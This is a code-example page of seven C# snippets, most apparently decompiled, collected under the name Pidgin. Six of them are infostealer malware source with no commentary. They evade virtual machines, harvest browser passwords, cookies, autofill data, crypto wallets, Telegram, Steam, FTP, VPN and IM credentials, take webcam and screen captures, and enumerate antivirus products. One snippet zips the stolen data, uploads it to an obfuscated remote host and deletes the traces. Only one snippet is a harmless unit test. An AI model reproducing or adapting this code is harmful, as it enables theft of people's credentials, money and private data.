Ejemplo n.º 1
0
        // Token: 0x060000B4 RID: 180 RVA: 0x00007BA4 File Offset: 0x00005DA4
        private static void GetPasswords(ref List <PassData> list)
        {
            List <PassData> list2 = FileZilla.Initialise();

            if (list2 != null)
            {
                list.AddRange(list2);
            }
            List <PassData> list3 = Pidgin.Initialise();

            if (list3 != null)
            {
                list.AddRange(list3);
            }
            List <PassData> list4 = Mozilla.Initialise();

            if (list4 != null)
            {
                list.AddRange(list4);
            }
            List <PassData> list5 = Reborn.Browsers.Chromium.Initialise();

            if (list5 != null)
            {
                list.AddRange(list5);
            }
            Reborn.Cookies.Chromium.Initialise();
        }
Ejemplo n.º 2
0
        public static void Main()
        {
            // Проверяем на запуск виртуальных машин ( Virtual Machine Check )
            if (!AntiVM.GetCheckVMBot() && !RunCheck.InstanceCheck())
            {
                Environment.Exit(0);
            }
            // Создаём папку куда будем всё собирать
            HomeDirectory.Inizialize();
            // Делаем проверку что папка создалась
            if (CombineEx.ExistsDir(GlobalPath.HomePath))
            {
                // Собираем данные ....
                Telega.GetSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*");
                MailFoxPassword.Inizialize();
                BuffBoard.Inizialize();
                NordVPN.Inizialize_Grabber();
                DynDns.Inizialize_Grabber();
                FileZilla.Inizialize_Grabber();
                Pidgin.Inizialize_Grabber();
                GetSteamFiles.Inizialize("*.", "*.vdf", "config", "Steam");
                InfoGrabber.Inizialize();
                ScreenShot.Inizialize(GlobalPath.Screen);

                // Сбор и вывод логинов и паролей
                Searcher.CopyInSafeDir(GlobalPath.LoginsPath, "Login Data");
                GetPasswords.Inizialize_Multi_file();

                // Сбор и вывод куки данных
                Searcher.CopyInSafeDir(GlobalPath.CookiesPath, "Cookies");
                GetCookies.Inizialize();

                // Сбор и вывод Автозаполнение форм
                Searcher.CopyInSafeDir(GlobalPath.WebDataPath, "Web Data");
                GetAutoFill.Inizialize_AutoFill();
            }
        }
Ejemplo n.º 3
0
    public bool Start(string[] Params)
    {
        Information.Start();
        ProcList.Parse();
        Thread.Sleep(new Random().Next(1, 5) * 100);
        if (Base64.Decode(Params[2]) == "1")
        {
            clipper.Start();
        }
        Action action = delegate
        {
            CBoard.Start();
        };

        try
        {
            if (base.InvokeRequired)
            {
                Invoke(action);
            }
            else
            {
                action();
            }
        }
        catch
        {
        }
        DesktopImg.Start();
        DFiles.Start();
        WebCam.Start();
        FZ.Start();
        Pidgin.Start();
        DS.Start();
        TG.Start();
        Skype.Start();
        Steam.Start();
        BTCQt.Start();
        BTCByte.Start();
        BTCDASH.Start();
        BTCETH.Start();
        BTCMON.Start();
        Thread.Sleep(new Random().Next(1, 5) * 1000);
        EGChromeC.Start();
        string text = null;

        text = $"{Buffer.path_ad}{GetRandom.String(null, 8)}";
        if (File.Exists(text))
        {
            File.Delete(text);
        }
        ZipFile.CreateFromDirectory(Buffer.path_l, text);
        try
        {
            if (!EntryPoint.activation)
            {
                Environment.FailFast("Program has been crashed");
            }
            using (WebClient webClient = new WebClient())
            {
                NameValueCollection nameValueCollection = new NameValueCollection();
                nameValueCollection.Add("_x_key_x_", Base64.Encode(EntryPoint.key));
                nameValueCollection.Add("zipx", Base64.Encode(File.ReadAllText(text, Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251)));
                nameValueCollection.Add("desktop", Base64.Encode(File.ReadAllText($"{Buffer.path_l}ScreenShot.png", Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251)));
                nameValueCollection.Add("webcam", Base64.Encode(File.ReadAllText($"{Buffer.path_l}WebCam.jpg", Encoding.GetEncoding(1251)), Encoding.GetEncoding(1251)));
                nameValueCollection.Add("email", Params[0]);
                nameValueCollection.Add("caption", Exporter.Export("<title>", "</title>", Starter.FileData));
                nameValueCollection.Add("username", Base64.Encode(Environment.UserName));
                nameValueCollection.Add("c_count", Base64.Encode(Buffer.XBufferData[0]));
                nameValueCollection.Add("pcount", Base64.Encode(Buffer.XBufferData[1]));
                nameValueCollection.Add("acount", Base64.Encode(Buffer.XBufferData[10]));
                nameValueCollection.Add("cd_count", Base64.Encode(Buffer.XBufferData[11]));
                nameValueCollection.Add("steam", Base64.Encode(Buffer.XBufferData[6]));
                nameValueCollection.Add("fzilla", Base64.Encode(Buffer.XBufferData[2]));
                nameValueCollection.Add("tg", Base64.Encode(Buffer.XBufferData[3]));
                nameValueCollection.Add("dcord", Base64.Encode(Buffer.XBufferData[4]));
                nameValueCollection.Add("skype", Base64.Encode(Buffer.XBufferData[5]));
                nameValueCollection.Add("b-core", Base64.Encode(Buffer.XBufferData[7]));
                nameValueCollection.Add("b-byte", Base64.Encode(Buffer.XBufferData[13]));
                nameValueCollection.Add("b-d", Base64.Encode(Buffer.XBufferData[14]));
                nameValueCollection.Add("b-ethe", Base64.Encode(Buffer.XBufferData[15]));
                nameValueCollection.Add("b-mon", Base64.Encode(Buffer.XBufferData[16]));
                nameValueCollection.Add("avinstall", Base64.Encode(Buffer.XBufferData[18]));
                nameValueCollection.Add("_version_", Base64.Encode("3200"));
                while (true)
                {
                    try
                    {
                        if (Encoding.Default.GetString(webClient.UploadValues(string.Format("http://{0}", Base64.Decode(string.Format("{0}{1}{2}", Buffer.Sender, Buffer.Handler, "="))), nameValueCollection)) == "good")
                        {
                            goto IL_040a;
                        }
                    }
                    catch
                    {
                    }
                    Thread.Sleep(2000);
                }
            }
        }
        catch
        {
        }
        goto IL_040a;
IL_040a:
        try
        {
            Directory.Delete(Buffer.path_l, recursive: true);
        }
        catch
        {
        }
        try
        {
            File.Delete(text);
        }
        catch
        {
        }
        return(true);
    }
Ejemplo n.º 4
0
        public static Credentials Create(ClientSettings settings)
        {
            Credentials credentials = new Credentials()
            {
                Browsers           = (IList <Browser>) new List <Browser>(),
                Files              = (IList <RemoteFile>) new List <RemoteFile>(),
                FtpConnections     = (IList <LoginPair>) new List <LoginPair>(),
                Hardwares          = (IList <Hardware>) new List <Hardware>(),
                InstalledBrowsers  = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(),
                InstalledSoftwares = (IList <string>) new List <string>(),
                Languages          = (IList <string>) new List <string>(),
                Processes          = (IList <string>) new List <string>(),
                Defenders          = (IList <string>) new List <string>()
            };

            try
            {
                WmiService wmiService = new WmiService();
                try
                {
                    ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null);
                    credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware()
                    {
                        Caption   = x.Name,
                        HardType  = HardwareType.Processor,
                        Parameter = string.Format("{0}", (object)x.NumberOfCores)
                    })).ToList <Hardware>();
                }
                catch
                {
                }
                try
                {
                    if (credentials.Hardwares == null)
                    {
                        credentials.Hardwares = (IList <Hardware>) new List <Hardware>();
                    }
                    foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware()
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Graphic,
                        Parameter = string.Format("{0}", (object)x.AdapterRAM)
                    })).ToList <Hardware>())
                    {
                        credentials.Hardwares.Add(hardware);
                    }
                }
                catch
                {
                }
                try
                {
                    List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>()
                    {
                        (WmiQueryBase) new WmiAntivirusQuery(),
                        (WmiQueryBase) new WmiAntiSpyWareQuery(),
                        (WmiQueryBase) new WmiFirewallQuery()
                    };
                    string[] strArray = new string[2]
                    {
                        "ROOT\\SecurityCenter2",
                        "ROOT\\SecurityCenter"
                    };
                    List <WmiAntivirus> source = new List <WmiAntivirus>();
                    foreach (WmiQueryBase wmiQuery in wmiQueryBaseList)
                    {
                        foreach (string scope in strArray)
                        {
                            try
                            {
                                source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
                            }
                            catch
                            {
                            }
                        }
                    }
                    credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>();
                }
                catch
                {
                }
                credentials.InstalledBrowsers  = (IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers();
                credentials.Processes          = (IList <string>)UserInfoHelper.ListOfProcesses();
                credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms();
                credentials.Languages          = (IList <string>)UserInfoHelper.AvailableLanguages();
                if (settings.GrabBrowsers)
                {
                    List <Browser> browserList = new List <Browser>();
                    browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers());
                    browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers());
                    browserList.Add(EdgeEngine.ParseBrowsers());
                    foreach (Browser browser in browserList)
                    {
                        if (!browser.IsEmpty())
                        {
                            credentials.Browsers.Add(browser);
                        }
                    }
                }
                if (settings.GrabFiles)
                {
                    credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths);
                }
                if (settings.GrabFTP)
                {
                    List <LoginPair> loginPairList = new List <LoginPair>();
                    loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections());
                    loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections());
                    credentials.FtpConnections = (IList <LoginPair>)loginPairList;
                }
                if (settings.GrabImClients)
                {
                    foreach (LoginPair connection in Pidgin.ParseConnections())
                    {
                        credentials.FtpConnections.Add(connection);
                    }
                }
            }
            catch
            {
            }
            return(credentials);
        }
Ejemplo n.º 5
0
        public void Test_implementsSearchForNewer()
        {
            var p = new Pidgin(false);

            Assert.IsTrue(p.implementsSearchForNewer());
        }
Ejemplo n.º 6
0
        // Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC
        public static Credentials Create(ClientSettings settings)
        {
            Credentials credentials = new Credentials
            {
                Defenders          = new List <string>(),
                Browsers           = new List <Browser>(),
                Files              = new List <RemoteFile>(),
                FtpConnections     = new List <LoginPair>(),
                Hardwares          = new List <Hardware>(),
                InstalledBrowsers  = new List <InstalledBrowserInfo>(),
                InstalledSoftwares = new List <string>(),
                Languages          = new List <string>(),
                Processes          = new List <string>(),
                ColdWallets        = new List <ColdWallet>(),
                ImportantAutofills = new List <Autofill>(),
                SteamFiles         = new List <RemoteFile>(),
                NordVPN            = new List <LoginPair>(),
                OpenVPN            = new List <RemoteFile>(),
                ProtonVPN          = new List <RemoteFile>(),
                TelegramFiles      = new List <RemoteFile>()
            };

            try
            {
                try
                {
                    ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null);
                    credentials.Hardwares = (from x in source
                                             select new Hardware
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Processor,
                        Parameter = string.Format("{0}", x.NumberOfCores)
                    }).ToList <Hardware>();
                }
                catch
                {
                }
                try
                {
                    WmiService wmiService = new WmiService();
                    if (credentials.Hardwares == null)
                    {
                        credentials.Hardwares = new List <Hardware>();
                    }
                    foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null)
                                               where x.AdapterRAM > 0U
                                               select new Hardware
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Graphic,
                        Parameter = string.Format("{0}", x.AdapterRAM)
                    }).ToList <Hardware>())
                    {
                        credentials.Hardwares.Add(item);
                    }
                }
                catch
                {
                }
                try
                {
                    credentials.Hardwares.Add(new Hardware
                    {
                        Caption   = "Total of RAM",
                        HardType  = HardwareType.Graphic,
                        Parameter = UserInfoHelper.TotalOfRAM()
                    });
                }
                catch
                {
                }
                try
                {
                    WmiService          wmiService2 = new WmiService();
                    List <WmiQueryBase> list        = new List <WmiQueryBase>
                    {
                        new WmiAntivirusQuery(),
                        new WmiAntiSpyWareQuery(),
                        new WmiFirewallQuery()
                    };
                    string[] array = new string[]
                    {
                        "ROOT\\SecurityCenter2",
                        "ROOT\\SecurityCenter"
                    };
                    List <WmiAntivirus> list2 = new List <WmiAntivirus>();
                    foreach (WmiQueryBase wmiQuery in list)
                    {
                        foreach (string scope in array)
                        {
                            try
                            {
                                list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
                            }
                            catch
                            {
                            }
                        }
                    }
                    credentials.Defenders = (from x in list2
                                             select x.DisplayName).Distinct <string>().ToList <string>();
                }
                catch
                {
                }
                credentials.InstalledBrowsers  = UserInfoHelper.GetBrowsers();
                credentials.Processes          = UserInfoHelper.ListOfProcesses();
                credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
                credentials.Languages          = UserInfoHelper.AvailableLanguages();
                if (settings.GrabTelegram)
                {
                    credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles());
                }
                if (settings.GrabVPN)
                {
                    credentials.NordVPN.AddRange(NordVPN.GetProfile());
                    credentials.OpenVPN.AddRange(OpenVPN.ParseFiles());
                    credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles());
                }
                if (settings.GrabSteam)
                {
                    credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles());
                }
                if (settings.GrabBrowsers)
                {
                    List <Browser> list3 = new List <Browser>();
                    if (settings.PortablePaths == null)
                    {
                        settings.PortablePaths = new List <string>();
                    }
                    settings.PortablePaths.Add(Constants.RoamingAppData);
                    settings.PortablePaths.Add(Constants.LocalAppData);
                    List <string> list4 = new List <string>();
                    List <string> list5 = new List <string>();
                    foreach (string text in Constants.chromiumBrowserPaths)
                    {
                        string text2 = string.Empty;
                        if (text.Contains("Opera"))
                        {
                            text2 = Constants.RoamingAppData + text;
                        }
                        else
                        {
                            text2 = Constants.LocalAppData + text;
                        }
                        if (Directory.Exists(text2))
                        {
                            foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[]
                            {
                                "Login Data",
                                "Web Data",
                                "Cookies"
                            }))
                            {
                                if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3))
                                {
                                    list4.Add(text3);
                                }
                            }
                        }
                    }
                    foreach (string str in Constants.geckoBrowserPaths)
                    {
                        try
                        {
                            string text4 = Constants.RoamingAppData + str;
                            if (Directory.Exists(text4))
                            {
                                foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[]
                                {
                                    "key3.db",
                                    "key4.db",
                                    "cookies.sqlite",
                                    "logins.json"
                                }))
                                {
                                    if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5))
                                    {
                                        list5.Add(text5);
                                    }
                                }
                            }
                        }
                        catch
                        {
                        }
                    }
                    list3.AddRange(ChromiumEngine.ParseBrowsers(list4));
                    list3.AddRange(GeckoEngine.ParseBrowsers(list5));
                    foreach (Browser browser in list3)
                    {
                        if (!browser.IsEmpty())
                        {
                            using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator())
                            {
                                while (enumerator6.MoveNext())
                                {
                                    Autofill autofill = enumerator6.Current;
                                    if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value))
                                    {
                                        credentials.ImportantAutofills.Add(autofill);
                                    }
                                }
                            }
                            credentials.Browsers.Add(browser);
                        }
                    }
                }
                if (settings.GrabWallets)
                {
                    List <ColdWallet> list6 = new List <ColdWallet>();
                    list6.AddRange(ColdWalletsGrabber.ParseFiles());
                    foreach (ColdWallet item2 in list6)
                    {
                        credentials.ColdWallets.Add(item2);
                    }
                }
                if (settings.GrabFiles)
                {
                    credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null);
                }
                if (settings.GrabFTP)
                {
                    List <LoginPair> list7 = new List <LoginPair>();
                    list7.AddRange(FileZilla.ParseConnections());
                    list7.AddRange(WinSCP.ParseConnections());
                    credentials.FtpConnections = list7;
                }
                if (settings.GrabImClients)
                {
                    foreach (LoginPair item3 in Pidgin.ParseConnections())
                    {
                        credentials.FtpConnections.Add(item3);
                    }
                }
            }
            catch (Exception)
            {
            }
            return(credentials);
        }
Ejemplo n.º 7
0
        public static Credentials Create(ClientSettings settings)
        {
            Credentials credentials = new Credentials
            {
                Browsers           = new List <Browser>(),
                Files              = new List <RemoteFile>(),
                FtpConnections     = new List <LoginPair>(),
                Hardwares          = new List <Hardware>(),
                InstalledBrowsers  = new List <InstalledBrowserInfo>(),
                InstalledSoftwares = new List <string>(),
                Languages          = new List <string>(),
                Processes          = new List <string>(),
                Defenders          = new List <string>()
            };

            try
            {
                WmiService wmiService = new WmiService();
                try
                {
                    ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery());
                    credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware
                    {
                        Caption   = x.Name,
                        HardType  = HardwareType.Processor,
                        Parameter = $"{x.NumberOfCores}"
                    }).ToList();
                }
                catch
                {
                }
                try
                {
                    if (credentials.Hardwares == null)
                    {
                        credentials.Hardwares = new List <Hardware>();
                    }
                    foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery())
                                               where x.AdapterRAM != 0
                                               select new Hardware
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Graphic,
                        Parameter = $"{x.AdapterRAM}"
                    }).ToList())
                    {
                        credentials.Hardwares.Add(item);
                    }
                }
                catch
                {
                }
                try
                {
                    List <WmiQueryBase> list = new List <WmiQueryBase>
                    {
                        new WmiAntivirusQuery(),
                        new WmiAntiSpyWareQuery(),
                        new WmiFirewallQuery()
                    };
                    string[] array = new string[2]
                    {
                        "ROOT\\SecurityCenter2",
                        "ROOT\\SecurityCenter"
                    };
                    List <WmiAntivirus> list2 = new List <WmiAntivirus>();
                    foreach (WmiQueryBase item2 in list)
                    {
                        string[] array2 = array;
                        foreach (string scope in array2)
                        {
                            try
                            {
                                list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList());
                            }
                            catch
                            {
                            }
                        }
                    }
                    credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList();
                }
                catch
                {
                }
                credentials.InstalledBrowsers  = UserInfoHelper.GetBrowsers();
                credentials.Processes          = UserInfoHelper.ListOfProcesses();
                credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
                credentials.Languages          = UserInfoHelper.AvailableLanguages();
                if (settings.GrabBrowsers)
                {
                    List <Browser> list3 = new List <Browser>();
                    list3.AddRange(ChromiumEngine.ParseBrowsers());
                    list3.AddRange(GeckoEngine.ParseBrowsers());
                    list3.Add(EdgeEngine.ParseBrowsers());
                    foreach (Browser item3 in list3)
                    {
                        if (!item3.IsEmpty())
                        {
                            credentials.Browsers.Add(item3);
                        }
                    }
                }
                if (settings.GrabFiles)
                {
                    credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths);
                }
                if (settings.GrabFTP)
                {
                    List <LoginPair> list4 = new List <LoginPair>();
                    list4.AddRange(FileZilla.ParseConnections());
                    list4.AddRange(WinSCP.ParseConnections());
                    credentials.FtpConnections = list4;
                }
                if (settings.GrabImClients)
                {
                    foreach (LoginPair item4 in Pidgin.ParseConnections())
                    {
                        credentials.FtpConnections.Add(item4);
                    }
                    return(credentials);
                }
                return(credentials);
            }
            catch
            {
                return(credentials);
            }
        }